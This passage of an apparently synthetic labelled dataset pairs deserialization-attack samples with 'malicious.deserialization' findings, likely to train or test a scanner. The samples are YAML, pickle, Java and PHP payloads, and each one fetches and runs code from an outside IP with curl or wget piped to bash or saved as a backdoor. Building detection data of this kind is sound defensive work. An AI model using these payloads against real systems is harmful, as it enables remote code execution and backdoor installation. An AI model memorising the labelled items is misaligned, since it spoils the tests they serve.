contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:75:\"pOsXDTXQcoveKu0jObq9SwbUBSr4Xg12xTFCq3SP\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://78.90.249.105/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:75:\"pOsXDTXQcoveKu0jObq9SwbUBSr4Xg12xTFCq3SP\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://78.90.249.105/bd\")"}}]} {"id": "synth_malicious_deserialization_00336", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://69.105.136.115/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://69.105.136.115/shell\")"}}]} {"id": "synth_malicious_deserialization_00337", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://91.88.23.32/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://153.107.182.146/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://91.88.23.32/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://153.107.182.146/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00338", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('H53jjm9kdvH+sEXH2PwIsTBWMASBlOM13nNfolhqClFz5cTy7pcBfd+tlwrg')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://32.66.94.247/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('H53jjm9kdvH+sEXH2PwIsTBWMASBlOM13nNfolhqClFz5cTy7pcBfd+tlwrg')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00339", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://106.226.162.142/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://106.226.162.142/shell\")"}}]} {"id": "synth_malicious_deserialization_00340", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://9.189.43.148/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://47.24.96.10/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://9.189.43.148/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://47.24.96.10/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00341", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('xb9Z70sx4PUEKUsRKhskvNXXT+b9HHekQ1Wf5k+Oi+LFQ4KQ5G8V7cLu8LVu')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://121.26.119.216/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('xb9Z70sx4PUEKUsRKhskvNXXT+b9HHekQ1Wf5k+Oi+LFQ4KQ5G8V7cLu8LVu')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00342", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://197.105.171.75/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://135.75.213.167/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://197.105.171.75/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://135.75.213.167/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00343", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:43:\"KqUjHwIz7RP3wkxUVFBqqSVHBXW59OQMTW1aDz9X\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://57.9.80.77/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:43:\"KqUjHwIz7RP3wkxUVFBqqSVHBXW59OQMTW1aDz9X\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://57.9.80.77/bd\")"}}]} {"id": "synth_malicious_deserialization_00344", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://22.82.42.124/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://231.196.66.92/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://22.82.42.124/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://231.196.66.92/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00345", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://57.218.6.66/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://57.218.6.66/shell\")"}}]} {"id": "synth_malicious_deserialization_00346", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:61:\"N3RWo3mzz5L+GdOX6YDkMhU2c1/m2AYpXI/Mf6WX\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://164.118.91.220/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:61:\"N3RWo3mzz5L+GdOX6YDkMhU2c1/m2AYpXI/Mf6WX\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://164.118.91.220/bd\")"}}]} {"id": "synth_malicious_deserialization_00347", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:33:\"mgaoZ/MJHYXqw0YCu4zl36RcbhpGbDWJOz0vT2wq\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://211.210.20.240/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:33:\"mgaoZ/MJHYXqw0YCu4zl36RcbhpGbDWJOz0vT2wq\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://211.210.20.240/bd\")"}}]} {"id": "synth_malicious_deserialization_00348", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://217.180.231.6/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://161.136.116.161/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://217.180.231.6/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://161.136.116.161/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00349", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('2AwcBo3cY17YhrYGCYKCEpBLMqcgbcwWxkk8FBB2itDnJscMTf9QmrgoNsUP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://94.93.82.227/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('2AwcBo3cY17YhrYGCYKCEpBLMqcgbcwWxkk8FBB2itDnJscMTf9QmrgoNsUP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00350", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://52.170.8.26/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://52.170.8.26/shell\")"}}]} {"id": "synth_malicious_deserialization_00351", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://37.233.73.171/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://37.233.73.171/shell\")"}}]} {"id": "synth_malicious_deserialization_00352", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:71:\"rgnWxNjri6SPmD3DgrJaaRailq15CHQCgsVYJBeZ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://201.26.129.176/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:71:\"rgnWxNjri6SPmD3DgrJaaRailq15CHQCgsVYJBeZ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://201.26.129.176/bd\")"}}]} {"id": "synth_malicious_deserialization_00353", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://174.42.246.198/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://174.42.246.198/shell\")"}}]} {"id": "synth_malicious_deserialization_00354", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://160.209.220.195/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://208.195.106.66/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://160.209.220.195/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://208.195.106.66/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00355", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('0vZKpQXS0M1NO0ax0Z3TVtJdRHI3IkJPKE4m79TKd7tfEv5rBP6JEnEHzQLf')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://230.130.31.17/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('0vZKpQXS0M1NO0ax0Z3TVtJdRHI3IkJPKE4m79TKd7tfEv5rBP6JEnEHzQLf')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00356", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('mj7V0U+JtM5/VvgJSRqOPphyaYjYG/830Ykr07j0j06k0173t3oJRg8YZXw6')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://67.247.156.227/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('mj7V0U+JtM5/VvgJSRqOPphyaYjYG/830Ykr07j0j06k0173t3oJRg8YZXw6')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00357", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://119.233.193.195/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://119.233.193.195/shell\")"}}]} {"id": "synth_malicious_deserialization_00358", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://200.154.7.109/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://200.154.7.109/shell\")"}}]} {"id": "synth_malicious_deserialization_00359", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:55:\"spyms+Jner6or0LkQCadMnQX43KW3uUAxEIueLIs\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://33.231.188.74/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:55:\"spyms+Jner6or0LkQCadMnQX43KW3uUAxEIueLIs\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://33.231.188.74/bd\")"}}]} {"id": "synth_malicious_deserialization_00360", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('loYTF4fByYK5DERDiVw9WAo/zO0x9Osd/IxYLJEKT7Ppd4JXOrsVWazmCvvg')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://97.95.56.162/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('loYTF4fByYK5DERDiVw9WAo/zO0x9Osd/IxYLJEKT7Ppd4JXOrsVWazmCvvg')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00361", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://171.133.45.26/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://110.119.28.96/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://171.133.45.26/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://110.119.28.96/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00362", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://117.228.26.43/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://117.228.26.43/shell\")"}}]} {"id": "synth_malicious_deserialization_00363", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:72:\"5XsNq5VrkYR87IVdIvd7vHPU6kN7HOYNQtzGZcZF\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://195.247.176.69/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:72:\"5XsNq5VrkYR87IVdIvd7vHPU6kN7HOYNQtzGZcZF\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://195.247.176.69/bd\")"}}]} {"id": "synth_malicious_deserialization_00364", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:59:\"16z41zJEHJAqgYvbFkEK3Py11Xn78g55ra5C8c59\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://154.99.116.250/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:59:\"16z41zJEHJAqgYvbFkEK3Py11Xn78g55ra5C8c59\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://154.99.116.250/bd\")"}}]} {"id": "synth_malicious_deserialization_00365", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('n1GYEHib9pjfLnwPkNb+FwFu4pzCHIeRflnaUH7yxvUI9ux99tnqGzf2+iGK')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://106.82.73.65/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('n1GYEHib9pjfLnwPkNb+FwFu4pzCHIeRflnaUH7yxvUI9ux99tnqGzf2+iGK')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00366", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:56:\"OMiXEgzoUt4bErjJans2KuyzTvsKX+jHj+uIrzNo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://113.38.179.81/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:56:\"OMiXEgzoUt4bErjJans2KuyzTvsKX+jHj+uIrzNo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://113.38.179.81/bd\")"}}]} {"id": "synth_malicious_deserialization_00367", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://118.250.60.108/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://3.128.200.1/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://118.250.60.108/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://3.128.200.1/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00368", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://33.17.54.168/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://55.120.63.104/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://33.17.54.168/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://55.120.63.104/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00369", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://188.20.37.231/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://188.20.37.231/shell\")"}}]} {"id": "synth_malicious_deserialization_00370", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://179.85.80.138/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://37.168.188.204/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://179.85.80.138/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://37.168.188.204/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00371", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('+BT4mOuYvJi3k72st1W0w+WBCcOST410Wf8uKPG0JPmYMlpyC45wVxkLCo9e')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://136.80.65.35/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('+BT4mOuYvJi3k72st1W0w+WBCcOST410Wf8uKPG0JPmYMlpyC45wVxkLCo9e')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00372", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://79.190.134.227/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://79.190.134.227/shell\")"}}]} {"id": "synth_malicious_deserialization_00373", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://100.181.42.252/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://139.238.168.149/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://100.181.42.252/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://139.238.168.149/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00374", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:35:\"MlkHitoOWuxDh5oCTvebEyT3EpHxKn3KH3AUyAce\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://143.86.241.93/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:35:\"MlkHitoOWuxDh5oCTvebEyT3EpHxKn3KH3AUyAce\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://143.86.241.93/bd\")"}}]} {"id": "synth_malicious_deserialization_00375", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://126.76.23.180/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://126.76.23.180/shell\")"}}]} {"id": "synth_malicious_deserialization_00376", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:23:\"zu4Hl4O+/oJ1DxK/AiH8pe93P8rvRGtFdA1cfYHg\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://65.50.188.199/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:23:\"zu4Hl4O+/oJ1DxK/AiH8pe93P8rvRGtFdA1cfYHg\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://65.50.188.199/bd\")"}}]} {"id": "synth_malicious_deserialization_00377", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('jaidbUH3KnoQ0ulwW6edu/14Piw58wfKj+cxsuYdghXviTZue55usSteX3Sq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://186.11.194.17/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", 